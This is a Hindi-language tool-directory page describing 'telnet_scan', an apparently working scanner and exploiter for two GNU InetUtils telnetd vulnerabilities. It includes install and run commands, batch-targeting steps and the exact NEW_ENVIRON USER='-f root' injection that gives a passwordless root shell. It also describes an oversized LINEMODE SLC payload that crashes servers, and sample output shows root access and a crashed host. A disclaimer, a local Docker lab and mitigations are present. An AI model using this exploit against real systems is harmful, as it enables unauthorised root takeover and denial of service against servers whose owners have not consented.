Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
telnet_scan — स्कैनर/एक्सप्लॉइटर CVE-2026-24061 और CVE-2026-32746 | Kitploit
उपकरण/GitHubGitHub/ekomssavior/telnet_scan
भेद्यता स्कैनरशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubekomssavior/telnet_scan

telnet_scan

स्कैनर/एक्सप्लॉइटर CVE-2026-24061 और CVE-2026-32746

रिपॉजिटरी देखें
11613 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Telnet Vulnerability Scanner (CVE-2026-24061 & CVE-2026-32746)

License:ek0ms

GNU InetUtils telnetd में दो गंभीर कमजोरियों का पता लगाने और (जहाँ लागू हो) शोषण करने के लिए एक Python-आधारित सुरक्षा मूल्यांकन उपकरण:

  • CVE-2026-24061 – USER पर्यावरण चर इंजेक्शन के माध्यम से प्रमाणीकरण बाईपास (CVSS 9.8)
  • CVE-2026-32746 – LINEMODE SLC हैंडलर में प्रमाणीकरण-पूर्व बफर ओवरफ्लो (CVSS 9.8)

महत्वपूर्ण अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
जिन सिस्टमों का आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, उनके विरुद्ध अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं। अपने स्वयं के जोखिम पर उपयोग करें।

image1(1)

विशेषताएँ

  • एकल लक्ष्य स्कैनिंग – रनटाइम पर IP पते या डोमेन नाम दर्ज करें
  • बैच स्कैनिंग – एकाधिक लक्ष्यों (प्रति पंक्ति एक) वाली फ़ाइल अपलोड करें
  • चयनात्मक परीक्षण – प्रत्येक कमजोरी का अलग-अलग या दोनों का परीक्षण करें
  • CVE-2026-24061 शोषण – यदि कमजोर है, तो उपकरण आपको उसी टर्मिनल में सीधे एक इंटरैक्टिव रूट शेल में डाल देता है
  • CVE-2026-32746 पहचान – नियंत्रित क्रैश डिटेक्शन के माध्यम से कमजोर सिस्टम की पहचान करता है
  • साफ टर्मिनल हैंडलिंग – बाहर निकलने पर उचित पुनर्स्थापना के साथ रॉ मोड शेल
  • कनेक्शन सत्यापन – फ़िल्टर किए गए पोर्ट, ऑफ़लाइन सेवाओं और वास्तविक कमजोरियों के बीच अंतर करता है
  • वर्बोज़ डीबगिंग – हर IAC पैकेट और चरण-दर-चरण शोषण विवरण देखने के लिए TELNET_SCAN_VERBOSE=1 सेट करें
  • Docker लैब वातावरण – सुरक्षित परीक्षण के लिए स्व-निहित कमजोर लक्ष्य
  • स्थापना

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    उपयोग

    मूल निष्पादन

    root@kitploit:~
    python3 telnet_scanner.py
    

    Docker लैब (सुरक्षित परीक्षण)

    वास्तविक सिस्टमों को जोखिम में डाले बिना ज्ञात कमजोर लक्ष्य के विरुद्ध शोषण का परीक्षण करें:

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # Target: 127.0.0.1, Port: 2323
    

    लैब एक पृथक कंटेनर में एक कमजोर GNU InetUtils 2.5 telnetd चलाता है, जो केवल localhost से बंधा होता है। कोई नेटवर्क एक्सपोज़र नहीं।

    वर्बोज़ मोड

    टेलनेट हैंडशेक डीबग करें और वायर पर वास्तव में क्या हो रहा है, इसे देखें:

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    वर्बोज़ आउटपुट दिखाता है:

    • भेजे और प्राप्त किए गए प्रत्येक IAC कमांड (DO/WILL/SB)
    • डिकोड किए गए टेलनेट विकल्प नाम
    • उप-वार्ता के लिए पेलोड हेक्स डंप
    • चरण-दर-चरण शोषण प्रवाह (6-चरणीय हैंडशेक)

    IMG_2498

    एकल लक्ष्य कार्यप्रवाह

    1. विकल्प 1 चुनें
    2. लक्ष्य दर्ज करें (IP या डोमेन, जैसे 192.168.1.100 या example.com)
    3. पोर्ट निर्दिष्ट करें (डिफ़ॉल्ट 23 है यदि खाली छोड़ा जाए)
    4. परीक्षण प्रकार चुनें:
      • 1 – दोनों कमजोरियाँ
      • 2 – केवल CVE-2026-24061 (प्रमाणीकरण बाईपास)
      • 3 – केवल CVE-2026-32746 (बफर ओवरफ्लो)

    बैच स्कैनिंग कार्यप्रवाह

    1. लक्ष्यों वाली एक फ़ाइल बनाएँ (प्रति पंक्ति एक) उदाहरण targets.txt:
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # यह एक टिप्पणी पंक्ति है - अनदेखा किया गया
      
    2. विकल्प 2 चुनें
    3. फ़ाइल नाम दर्ज करें
    4. पोर्ट निर्दिष्ट करें (डिफ़ॉल्ट 23 है)
    5. परीक्षण प्रकार चुनें (1, 2, या 3)
    6. स्कैनर:
      • प्रत्येक लक्ष्य के लिए प्रगति दिखाएगा
      • पूर्ण होते ही परिणाम प्रदर्शित करेगा
      • अंत में एक सारांश तालिका प्रदान करेगा

    जब एक शेल प्राप्त होता है

    यदि CVE-2026-24061 सफल होता है:

    1. कमजोरी का पता चलता है
    2. उसी टर्मिनल विंडो में एक इंटरैक्टिव रूट शेल दिखाई देता है
    3. कमांड टाइप करें और तुरंत आउटपुट देखें (जैसे id, whoami, ls)
    4. शेल से बाहर निकलने और स्कैनर मेनू पर वापस जाने के लिए Ctrl+C दबाएँ
    5. बैच स्कैन के लिए, आपसे पूछा जाएगा कि क्या शेल के साथ इंटरैक्ट करना है या स्कैन जारी रखना है

    कोई अलग टर्मिनल या अतिरिक्त चरणों की आवश्यकता नहीं है।

    यह कैसे काम करता है

    CVE-2026-24061 – प्रमाणीकरण बाईपास

    वास्तविक GNU InetUtils telnetd के साथ संगतता सुनिश्चित करने के लिए शोषण एक सटीक 6-चरणीय टेलनेट हैंडशेक का अनुसरण करता है:

    1. सर्वर वार्ता की प्रतीक्षा करें – रिवर्स DNS और प्रारंभिक DO विकल्पों के लिए 15 सेकंड तक
    2. WILL का उत्तर दें – TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON स्वीकार करें
    3. SB SEND की प्रतीक्षा करें – सर्वर से उप-वार्ता अनुरोध
    4. शोषण पेलोड भेजें – NEW_ENVIRON उप-वार्ता के माध्यम से USER="-f root" सेट करें
    5. शेष आदान-प्रदान संभालें – SGA, ECHO, LINEMODE, NAWS के लिए DO/WILL का उत्तर दें
    6. शेल का पता लगाएं – # , root@, या $ प्रॉम्प्ट देखें

    एक कीपलाइव थ्रेड पेलोड प्रोसेस होने से पहले telnetd के ttloop() को EOF का पता लगाने और exit(1) कॉल करने से रोकने के लिए हर 2 सेकंड में IAC NOP भेजता है।

    कमजोर telnetd /usr/bin/login को -f root पास करता है, प्रमाणीकरण को बायपास करता है और तत्काल रूट शेल एक्सेस प्रदान करता है।

    CVE-2026-32746 – बफर ओवरफ्लो का पता लगाना

    • LINEMODE विकल्प (RFC 1184) पर बातचीत करता है
    • निश्चित आकार के बफर को ओवरफ्लो करने के लिए 500+ SLC ट्रिपल (1500+ बाइट्स) भेजता है
    • कमजोरी की पुष्टि के लिए कनेक्शन रीसेट/क्रैश की निगरानी करता है

    कनेक्शन सत्यापन

    • शोषण का प्रयास करने से पहले सेवा उपलब्धता सत्यापित करने के लिए प्री-स्कैन करता है
    • के बीच अंतर करता है:
      • फ़िल्टर किए गए पोर्ट (फ़ायरवॉल अवरुद्ध)
      • ऑफ़लाइन सेवाएँ (कोई सेवा नहीं चल रही)
      • कमजोर सेवाएँ (सफल शोषण)

    नमूना आउटपुट

    एकल लक्ष्य

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. एकल लक्ष्य स्कैन करें
    2. फ़ाइल से लक्ष्य स्कैन करें (प्रति पंक्ति एक IP/होस्टनाम)
    3. बाहर निकलें
    
    विकल्प चुनें: 1
    पोर्ट (डिफ़ॉल्ट 23):
    
    कौन से परीक्षण चलाने हैं?
    1. दोनों
    2. केवल CVE-2026-24061 (auth bypass - यदि कमजोर है तो शेल देगा)
    3. केवल CVE-2026-32746 (बफर ओवरफ्लो का पता लगाना)
    विकल्प [1-3]: 1
    लक्ष्य (IP या डोमेन): 192.168.1.100
    
    [*] 192.168.1.100 हल किया गया -> 192.168.1.100
    [*] 192.168.1.100:23 स्कैन किया जा रहा है...
    
    [*] जाँच की जा रही है कि क्या सेवा पहुँच योग्य है...
    [+] सेवा पहुँच योग्य
    
    [*] CVE-2026-24061 (प्रमाणीकरण बाईपास) का परीक्षण किया जा रहा है...
    [!] CVE-2026-24061: कमजोर – शेल प्राप्त हुआ!
    
    ============================================================
    [+] रूट शेल प्राप्त हुआ! अब आप एक इंटरैक्टिव रूट शेल में हैं।
    [+] यहाँ सीधे कमांड टाइप करें। शेल से बाहर निकलने के लिए Ctrl+C दबाएँ।
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    वर्बोज़ मोड आउटपुट (आंशिक)

    root@kitploit:~
        [चरण 1/6] सर्वर वार्ता की प्रतीक्षा कर रहा है (15 सेकंड तक लग सकते हैं)...
        [चरण 1/6] 48 बाइट्स प्राप्त हुए: fffb18fffb20fffb23fffb27...
               डिकोड किया गया: IAC DO TERMINAL-TYPE
               डिकोड किया गया: IAC DO TERMINAL-SPEED
               डिकोड किया गया: IAC DO X-DISPLAY-LOCATION
               डिकोड किया गया: IAC DO NEW-ENVIRON
        [चरण 2/6] सभी DO विकल्पों के लिए WILL का उत्तर दिया जा रहा है
        [चरण 3/6] SB SEND उप-वार्ता अनुरोधों की प्रतीक्षा कर रहा है...
        [चरण 4/6] उप-वार्ता प्रतिक्रियाएँ भेजी जा रही हैं...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** शोषण ***
        [चरण 5/6] शेष विकल्प वार्ताओं को संभाला जा रहा है...
        [चरण 5/6] प्राप्त पाठ: 'root@vuln-lab:~# '
        [परिणाम] सफलता: USER="-f root" इंजेक्शन के माध्यम से पासवर्ड रहित रूट लॉगिन
    

    बैच स्कैन

    root@kitploit:~
    === Telnet Vulnerability Scanner ===
    1. एकल लक्ष्य स्कैन करें
    2. फ़ाइल से लक्ष्य स्कैन करें (प्रति पंक्ति एक IP/होस्टनाम)
    3. बाहर निकलें
    
    विकल्प चुनें: 2
    पोर्ट (डिफ़ॉल्ट 23):
    लक्ष्यों वाली फ़ाइल का नाम दर्ज करें (प्रति पंक्ति एक): targets.txt
    
    कौन से परीक्षण चलाने हैं?
    1. दोनों
    2. केवल CVE-2026-24061 (auth bypass - यदि कमजोर है तो शेल देगा)
    3. केवल CVE-2026-32746 (बफर ओवरफ्लो का पता लगाना)
    विकल्प [1-3]: 1
    
    [*] targets.txt से 3 लक्ष्य लोड किए गए
    
    ==================================================
    [1/3] 192.168.1.100:23 स्कैन किया जा रहा है
    ==================================================
    [*] 192.168.1.100 हल किया गया -> 192.168.1.100
    [+] सेवा पहुँच योग्य
    
    [*] CVE-2026-24061 का परीक्षण किया जा रहा है...
    [!] CVE-2026-24061: कमजोर – शेल प्राप्त हुआ!
    
    [?] शेल प्राप्त हुआ! अब बातचीत करें? (y/N): n
    
    [*] CVE-2026-32746 का परीक्षण किया जा रहा है...
    [+] सर्वर क्रैश नहीं हुआ; संभवतः कमजोर नहीं
    
    ==================================================
    [2/3] 192.168.1.101:23 स्कैन किया जा रहा है
    ==================================================
    [-] 192.168.1.101:23 पर सेवा पहुँच योग्य नहीं
    
    ==================================================
    [3/3] example.com:23 स्कैन किया जा रहा है
    ==================================================
    [*] example.com हल किया गया -> 93.184.216.34
    [+] सेवा पहुँच योग्य
    
    [*] CVE-2026-24061 का परीक्षण किया जा रहा है...
    [+] कोई प्रतिक्रिया प्राप्त नहीं हुई; अभी भी कमजोर हो सकता है
    
    [*] CVE-2026-32746 का परीक्षण किया जा रहा है...
    [!] CVE-2026-32746: कमजोर (सर्वर क्रैश हो गया)
    
    ============================================================
    स्कैन सारांश
    ============================================================
    192.168.1.100: CVE-2026-24061 के लिए कमजोर
    192.168.1.101: सेवा अप्राप्य
    example.com: CVE-2026-32746 के लिए कमजोर
    ============================================================
    

    शमन

    यदि आप कमजोर सिस्टम पाते हैं, तो ये सुधार लागू करें:

    1. GNU InetUtils को संस्करण 2.8 या बाद में अपग्रेड करें
    2. telnetd को अक्षम करें और नेटवर्क सीमाओं पर TCP/23 को ब्लॉक करें
    3. पहुँच को प्रतिबंधित करें केवल विश्वसनीय नेटवर्कों तक
    4. लॉग की निगरानी करें -f से शुरू होने वाले NEW_ENVIRON USER मानों वाले कनेक्शनों के लिए

    विकास और परीक्षण

    Docker लैब

    शामिल lab/ निर्देशिका एक सुरक्षित, पुनरुत्पादनीय परीक्षण वातावरण प्रदान करती है:

    root@kitploit:~
    cd lab
    docker compose up -d
    # telnetd प्रारंभ होने के लिए ~10 सेकंड प्रतीक्षा करें
    python3 ../telnet_scanner.py
    # Target: 127.0.0.1, Port: 2323
    

    लैब सुविधाएँ:

    • GNU InetUtils 2.5 स्रोत से संकलित (कमजोर संस्करण)
    • एक पृथक कंटेनर के अंदर telnetd चलाता है
    • केवल localhost:2323 से बंधा – विकास के लिए सुरक्षित
    • डीबगिंग के लिए एक परीक्षण उपयोगकर्ता (labuser:labpass123) शामिल है

    समाप्त होने पर लैब बंद करें:

    root@kitploit:~
    cd lab && docker compose down
    

    ज्ञात सीमाएँ

    • ओवरफ्लो परीक्षण (CVE-2026-32746) लक्ष्य telnetd सेवा को क्रैश कर सकता है
    • इंटरैक्टिव शेल में तीर कुंजियाँ और टर्मिनल आकार बदलना पूरी तरह से समर्थित नहीं हैं
    • कुछ फ़ायरवॉल या नेटवर्क कॉन्फ़िगरेशन टेलनेट विकल्प वार्ता में हस्तक्षेप कर सकते हैं
    • विंडोज़ उपयोगकर्ता: इंटरैक्टिव शेल को Unix-जैसे टर्मिनल (WSL, Cygwin, या Linux/macOS) की आवश्यकता होती है

    image0(2)

    आभार

    विशेष धन्यवाद @leetcrypt को – उचित 6-चरणीय हैंडशेक, कीपलाइव थ्रेड, वर्बोज़ मोड और Docker लैब शानदार है!


    अस्वीकरण: केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए।

    टूल डाउनलोड करें